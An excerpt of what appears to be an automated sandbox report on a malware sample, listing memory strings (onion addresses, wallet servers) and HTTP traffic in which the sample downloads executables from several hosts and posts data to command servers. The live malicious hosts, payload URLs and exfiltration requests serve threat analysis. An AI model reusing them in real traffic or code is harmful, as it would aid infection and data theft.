Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C41A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: .P19152c2014093e313d075d110f3d082e50http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionhttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzSELECT Name FROM Win32_VideoControllerS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7current filenname with args "C:\Users\user\AppData\Local\Temp\71C9.exe"
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 16:50:21 GMTContent-Type: application/octet-streamContent-Length: 776192Last-Modified: Thu, 28 Mar 2024 16:50:03 GMTConnection: closeETag: "66059fbb-bd800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a9 eb 64 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 68 75 00 00 00 00 00 27 3f 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 76 00 00 04 00 00 2e b2 0c 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 61 01 00 50 00 00 00 00 e0 75 00 c8 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 01 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 56 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 e5 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 6a 00 00 00 00 01 00 00 6c 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 6e 74 00 00 70 01 00 00 08 0a 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c8 79 00 00 00 e0 75 00 00 7a 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 16:51:08 GMTContent-Type: application/octet-streamContent-Length: 283648Last-Modified: Wed, 27 Mar 2024 17:00:03 GMTConnection: closeETag: "66045093-45400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 18 42 e4 08 5c 23 8a 5b 5c 23 8a 5b 5c 23 8a 5b 33 55 14 5b 44 23 8a 5b 33 55 20 5b 28 23 8a 5b 33 55 21 5b 7b 23 8a 5b 55 5b 19 5b 57 23 8a 5b 5c 23 8b 5b 37 23 8a 5b 33 55 25 5b 5d 23 8a 5b 33 55 10 5b 5d 23 8a 5b 33 55 17 5b 5d 23 8a 5b 52 69 63 68 5c 23 8a 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c9 f0 b2 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 f4 00 00 00 92 13 00 00 00 00 00 b1 1e 00 00 00 10 00 00 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 14 00 00 04 00 00 27 7f 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 5c 03 00 78 00 00 00 00 c0 13 00 b6 d9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 53 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 f2 00 00 00 10 00 00 00 f4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 55 02 00 00 10 01 00 00 56 02 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 42 10 00 00 70 03 00 00 2c 00 00 00 4e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b6 d9 00 00 00 c0 13 00 00 da 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 28 Mar 2024 16:51:15 GMTServer: ApacheLast-Modified: Thu, 07 Mar 2024 16:56:25 GMTETag: "682058-61314f4b1ca93"Accept-Ranges: bytesContent-Length: 6824024Cache-Control: max-age=31536000, publicExpires: Fri, 28 Mar 2025 16:51:15 GMTVary: Accept-EncodingReferrer-Policy: no-referrer-when-downgradePragma: publicKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 0a 00 69 3a e2 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 50 03 00 00 a4 13 00 00 00 00 00 7f e5 97 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 ce 00 00 04 00 00 ba bb 68 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 c7 98 00 f0 00 00 00 00 40 ca 00 28 07 04 00 00 00 00 00 00 00 00 00 00 06 68 00 58 1a 00 00 00 20 ca 00 24 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 66 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2b 4f 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c3 29 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 9b 00 00 00 90 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 cb 86 c2 a4 29 59 34 00 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 cb 86 c2 a4 a0 12 1e 00 00 90 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 c2 a2 7b c2 4b 70 0f 00 00 b0 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 76 6d 70 c2 a2 7b c2 24 02 00 00 00 30 66 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 a2 7b c2 d0 d9 63 00 00 40 66 00 00 da 63 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 24 1a 00 00 00 20 ca 00 00 1c 00 00 00 e2 63 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 28 07 04 00 00 40 ca 00 00 08 04 00 00 fe 63 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 28 Mar 2024 16:51:49 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Mon, 09 Oct 2023 19:50:06 GMTETag: "4ae00-6074de5a4a562"Accept-Ranges: bytesContent-Length: 306688Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 78.46.229.36 78.46.229.36
Source: Joe Sandbox View IP Address: 104.21.94.2 104.21.94.2
Source: Joe Sandbox View IP Address: 81.94.159.197 81.94.159.197
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: WESTCALL-ASRU WESTCALL-ASRU
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resergvearyinitiani.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: resergvearyinitiani.shop
Source: global traffic HTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14034Host: resergvearyinitiani.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 16264Host: resergvearyinitiani.shop
Source: global traffic HTTP traffic detected: GET /file/d/1Qqy-57DLmiipUvNEOUGrNV3pL-1VKzB_/view?usp=sharing HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19970Host: resergvearyinitiani.shop
Source: global traffic HTTP traffic detected: GET /e0cbefcb1af40c7d4aff4aca26621a98.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: jennyilis.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1266Host: resergvearyinitiani.shop
Source: global traffic HTTP traffic detected: GET /2b7fa37605b0ad5f1a14cbc68bbdca6f/e0cbefcb1af40c7d4aff4aca26621a98.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kilperdoper.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 580592Host: resergvearyinitiani.shop
Source: global traffic HTTP traffic detected: GET /attachments/1079752687278628966/1218325194725265428/Fupyivruk.exe?ex=660740c1&is=65f4cbc1&hm=fd820d24e53345690281599b22ef3adb9ee8518e9dbf6fb23e9b0949a35af707& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJDGHCBGDHIECBGIDAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIIJDGHCBFIECBKEGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJJKEHCAKFBFHJKEHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 7985Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
